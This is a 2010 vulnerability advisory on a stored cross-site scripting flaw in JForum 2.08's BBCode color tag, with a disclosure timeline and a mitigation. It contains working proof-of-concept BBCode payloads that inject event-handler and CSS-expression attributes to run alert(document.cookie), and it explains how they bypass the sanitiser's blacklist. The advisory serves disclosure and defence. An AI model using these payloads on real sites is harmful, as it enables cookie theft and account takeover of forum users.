MSA130510

JForum <= 2.08 is vulnerable to Stored Cross Site Scripting in BBCode.


Tested Versions:
JForum v. 2.08

Minded Security ReferenceID:
MSA130510

Credits:
Discovered by
Giorgio Fedon of Minded Security
giorgio.fedon [_at_] mindedsecurity.com

Severity:
Medium

Solution:
Disable color bbtag

Summary
Minded Security Consultants discovered during a penetration testing activity that JForum <= 2.08 is vulnerable to Stored Cross Site Scripting.

Analysis

BBcode configurations are loaded from "bb_config.xml" that contains configurations for bbcode to HTML conversion.

JForum/src/net/jforum/util/bbcode/BBCodeHandler.java (lines 76 to 87)

public BBCodeHandler() { }

public BBCodeHandler parse()
{
try
{
SAXParser parser = SAXParserFactory.newInstance().newSAXParser();
BBCodeHandler bbParser = new BBCodeHandler();

String path = SystemGlobals.getValue(ConfigKeys.CONFIG_DIR) +
"/bb_config.xml";
...

Tag "[color=red]Text[/color]" is handled by the following lines of code:

<!-- COLOR -->
<match name="color" removeQuotes="true">
<regex>(?s)(?i)\[color=['"]?(.*?[^'"])['"]?\](.*?)\[/color\]</regex>
<replace>
<![CDATA[
<font color='$1'>$2</font>
]]>
</replace>
</match>


As it's possible to see from the previous code, "color" attribute expects a parameter between single quotes. Jforum does not encode single quotes, so it's possible to add arbitrary attributes.

Before launching the attacks it's important to investigate other defense in depth measures inside Jforum. These controls are handled by: "JForum/src/net/jforum/util/SafeHtml.java"

By analizing this class it's possible to see that characters "<", ">" and " \" " are converted into HTML entities:


if (text.indexOf('>') > -1 || text.indexOf('<') > -1) {
StringBuffer tmp = new StringBuffer(text);
ViewCommon.replaceAll(tmp, "<", "&lt;");
ViewCommon.replaceAll(tmp, ">", "&gt;");
ViewCommon.replaceAll(tmp, "\"", "&quot;");
node.setText(tmp.toString());

}
}


If Decimal or Hex Entities are used, these will be modified to not allow auto decoding and javascript execution:

if (a.getValue().indexOf("&#") > -1) {
a.setValue(a.getValue().replaceAll("&#", "&amp;#"));


If "Style" attribute contains a parenthesis this will lead to clearing the attribute content:

else if ("STYLE".equals(name)) {
// It is much more a try to not allow constructions
// like style="background-color: url(javascript:xxxx)" than anything else
if (value.indexOf('(') > -1) {
return false;
}
}


From the code above an exact match against the attribute vector is performed. If the attribute equals to "style" the sanitization step takes place; unfortunately "/style" is still a valid attribute and allows to bypass the exact match.

The same technique can be used to evade Jforum blacklist restrictions for event handlers (es. onMouseOver, onMouseOut, etc.).

---- Proof Of Concept

Stored XSS - proof of concept for Firefox ("onMouseOver" is blacklisted):

[color=red'
style='top:0px;left:0px;position:absolute;font-size:500;opacity:0'
/onMouseOver='alert(document.cookie)']XSS4FF[/color]


Renders into the following HTML code:

<font color='red'
style='top:0px;left:0px;position:absolute;font-size:500;opacity:0'
/onMouseOver='alert(document.cookie)'>XSS4FF</font>


Stored XSS - proof of concept for Internet Explorer ("style" cannot contain
parenthesis "(" ):

[color=red' /style='color:expression(alert(document.cookie))']XSS4IE[/color]


Renders into the following HTML code:

<font color='red'
/style='color:expression(alert(document.cookie))'>XSS4IE</font>


Disclosure Timeline
14-02-2010 Issue Discovered
25-02-2010 Reported to Vendor
13-05-2010 Public Disclosure

Disclaimer

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information.

In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

Any use of this information is at the user's own risk. Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of Minded Security Research Lab. If you wish to reprint the whole or any part of this Alert in any other medium excluding
electronic medium, please e-mail research_at_mindedsecurity.com for permission.


Copyright (c) 2010 Minded Security, S.r.l..
All rights reserved worldwide.

3.100.000

end users protected

1000M

dynamic web pages scanned

17

Achieved Countries

Antitamper Mobile - Minded Security's Magik Quadrant for Mobile Code Protection

Minded Security's Magik Quadrant for Mobile Code Protection shows you our evaluation of the top vendors in this market, based on our research and experience.Magik Quadrant...

Posted on Wednesday April 29, 2015

Beyond Superfish: a Journey on SSL MitM in the Wild

Recently Lenovo hit the news because they got caught installing adware on their laptops, namely Superfish, ...

Posted on Thursday April 09, 2015

Exploiting CVE-2011-2461 on google.com

As a follow up of our Troopers 2015 presentation about CVE-2011-2461 we want to release more details about a real world exploitation scenario targeting Google services.During our large-scale an...

Posted on Monday March 30, 2015